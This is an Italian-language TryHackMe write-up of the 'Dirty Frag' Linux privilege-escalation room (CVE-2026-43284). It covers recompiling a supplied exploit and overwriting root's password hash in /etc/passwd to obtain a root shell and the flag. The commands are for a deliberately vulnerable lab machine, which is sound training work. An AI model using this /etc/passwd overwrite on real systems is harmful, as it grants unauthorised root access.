
TryHackMe Dirty Frag (CVE-2026-43284) — writeup su LPE Linux
Stanza: CVE-2026-43284: Dirty Frag Categoria: Linux Privilege Escalation Autore: (La mia pagina)
Dirty Frag è una stanza Linux di escalation dei privilegi locali (LPE) a catena costruita attorno a CVE-2026-43284. L'obiettivo è passare da una shell non privilegiata a root sfruttando un proof-of-concept fornito.
Elencando la directory di lavoro si rivelano i file forniti per l'exploit:
$ ls
README.txt
exp
exp.c
exp.c — il codice sorgente dell'exploitexp — un binario precompilato (potrebbe non corrispondere all'ambiente di destinazione)README.txt — note d'uso fornite con l'exploitPoiché il binario exp fornito potrebbe non essere compatibile con l'ambiente esatto del target, è più sicuro ricompilarlo dal sorgente:
$ gcc -O0 -Wall -o exp exp.c -lutil
-O0 disabilita le ottimizzazioni del compilatore, mantenendo il comportamento prevedibile e coerente con il sorgente-Wall abilita i warning del compilatore, utili per verificare la build-lutil collega libutil — spesso richiesto quando il codice usa funzioni di pseudo-terminale (pty)$ ./exp
Eseguire l'exploit compilato attiva il difetto sottostante, consentendo l'accesso in scrittura a un file che normalmente dovrebbe essere di sola lettura per gli utenti non privilegiati — in questo caso, /etc/passwd.
Una volta ottenuto l'accesso in scrittura, viene generato un nuovo hash della password per root:
$ openssl passwd -1 root
$1$igIXG8so$6K9OaEbAaj.qaknYx9ST..
Questo hash viene scritto in /etc/passwd al posto del campo hash esistente di root:
$ nano /etc/passwd
Con la password di root ora nota, il cambio utente è immediato:
$ su root
$ cat /root/flag.txt
THM{REDACTED}
Questo writeup documenta una stanza TryHackMe completata a scopo educativo. L'ambiente di destinazione è una macchina volutamente vulnerabile fornita da TryHackMe.